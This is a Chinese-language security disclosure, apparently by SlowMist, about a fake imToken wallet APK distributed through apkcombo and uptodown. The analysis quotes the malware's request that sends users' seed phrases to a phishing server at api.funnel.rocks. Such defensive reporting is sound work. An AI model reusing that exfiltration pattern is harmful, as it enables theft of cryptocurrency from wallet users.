Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

当你通过钱包在 Web3 世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包「登录」;这与我们传统意义上的「登录」不同,在 Web2 世界中,每个应用之间的账户不全是互通的。但在 Web3 的世界中,所有应用都是统一使用钱包去进行「登录」,我们可以看到「登录」钱包时显示的不是「Login with Wallet」,取而代之的是「Connect Wallet」。

背景

基于区块链技术的 Web3 正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但 Web3 与 Web2 是两个截然不同的世界。Web3 世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处 Web3 世界中,钱包则是进入 Web3 世界的入口以及通行证。

当你通过钱包在 Web3 世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包「登录」;这与我们传统意义上的「登录」不同,在 Web2 世界中,每个应用之间的账户不全是互通的。但在 Web3 的世界中,所有应用都是统一使用钱包去进行「登录」,我们可以看到「登录」钱包时显示的不是「Login with Wallet」,取而代之的是「Connect Wallet」。而钱包是你在 Web3 世界中的唯一通行证。

俗话说高楼之下必有阴影,在如此火热的 Web3 世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

在 Android 环境下,由于很多手机不支持 Google Play 或者因为网络问题,很多人会从其他途径下载 Google Play 的应用,比如:apkcombo、apkpure 等第三方下载站,这些站点往往标榜自己 App 是从 Google Play 镜像下载的,但是其真实安全性如何呢?

网站分析

鉴于下载途径众多,我们今天以 apkcombo 为例看看,apkcombo 是一个第三方应用市场,它提供的应用据官方说大部分来源于其他正规应用商店,但事实是否真如官方所说呢?

我们先看下 apkcombo 的流量有多大:

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

据数据统计站点 similarweb 统计,apkcombo 站点:

  • 全球排名:1,809
  • 国家排名:7,370
  • 品类排名:168

我们可以看到它的影响力和流量都非常大。

它默认提供了一款 chrome APK 下载插件,我们发现这款插件的用户数达到了 10 W+:

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

 

那么回到我们关注的 Web3 领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?

我们拿知名的 imToken 钱包为例,其 Google Play 的正规下载途径为:

https://play.google.com/store/apps/details?id=im.token.app

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

 

由于很多手机不支持 Google Play 或者因为网络问题,很多人会从这里下载 Google Play 的应用。

而 apkcombo 镜像站的下载路径为:

https://apkcombo.com/downloader/#package=im.token.app

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

上图我们可以发现,apkcombo 提供的版本为 24.9.11,经由 imToken 确认后,这是一个并不存在的版本!证实这是目前市面上假 imToken 钱包最多的一个版本。

在编写本文时 imToken 钱包的最新版本为 2.11.3,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。

如下图,我们在 apkcombo 上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的 Google Play 的下载量信息,安全起见,我们觉得有必要披露这个恶意 App 的来源,防止更多的人下载到此款假钱包。

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

同时我们发现类似的下载站还有如:uptodown

下载地址:https://imtoken.br.uptodown.com/android

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?
Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

 

我们发现 uptodown 任意注册即可发布 App,这导致钓鱼的成本变得极低:

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

钱包分析

在之前我们已经分析过不少假钱包的案例,如:2021-11-24 我们披露:《慢雾:假钱包 App 已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。

我们仅对 apkcombo 提供版本为 24.9.11 这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

根据逆向 APK 代码和实际分析流量包发现,助记词发送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

看下图,最早的「api.funnel.rocks」证书出现在 2022-06-03,也就是攻击开始的大概时间:

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

俗话说一图胜千言,最后我们画一个流程图:

Web3假钱包第三方源调查分析:如何甄别网络钓鱼攻击?

总结

目前这种骗局活动不仅活跃,甚至有扩大范围的趋势,每天都有新的受害者受骗。用户作为安全体系最薄弱的环节,应时刻保持怀疑之心,增强安全意识与风险意识,当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。

同时,如需使用钱包,请务必认准以下主流钱包 App 官方网址:

  • imToken 钱包:https://token.im/
  • TokenPocket 钱包:https://www.tokenpocket.pro/
  • TronLink 钱包:https://www.tronlink.org/
  • 比特派钱包:https://bitpie.com/
  • MetaMask 钱包:https://metamask.io/
  • Trust Wallet:https://trustwallet.com/

请持续关注慢雾安全团队,更多 Web3 安全风险分析与告警正在路上。

致谢:感谢在溯源过程中 imToken 官方提供的验证支持。

由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。

(声明:请读者严格遵守所在地法律法规,本文不代表任何投资建议)

(0)
上一篇 2023年4月25日 下午10:55
下一篇 2023年4月25日 下午11:09

相关推荐

  • 以太坊若被分叉,链上生态何去何从?

    Tether(USDT)和 Circle(USDC)两大稳定币发行方、主流预言机 ChainLink、链上借贷协议 Aave、BAYC 无聊猿发行方 Yuga Labs 等多个以太坊生态主流项目都表态将支持合并后的 PoS 链。而除了 PoW 矿工和波场创始人孙宇晨外,支持 PoW 链的声音较少。

    2022年8月22日
    595
  • 第一个Metaverse炒作周期结束了吗?

    2022 年被称为「元宇宙之年」。但最终,这是喜忧参半的一年,有意义的元宇宙成就必须与噪音和消极情绪作斗争。这反映在 Twitter 的推文中,其中的情绪、兴趣和参与涵盖了从巨大的热情到彻底的拒绝。

    2023年3月31日
    288
  • Bankless:共享排序器,让Rollup更加去中心化

    如果您像我一样是一个 DeFi 迷,那么您会喜欢一个好的 Rollup。交换、借贷和交易,所有这些只需要几分钱,而几年前这种近乎无摩擦的体验似乎是不可想象的。虽然有时候使用 Rollup 的体验更像 BNB Chain 这样的中心化链,而不是以太坊。

    2023年5月12日
    698

发表回复

登录后才能评论
微信

联系我们
邮箱:whylweb3@163.com
微信:gaoshuang613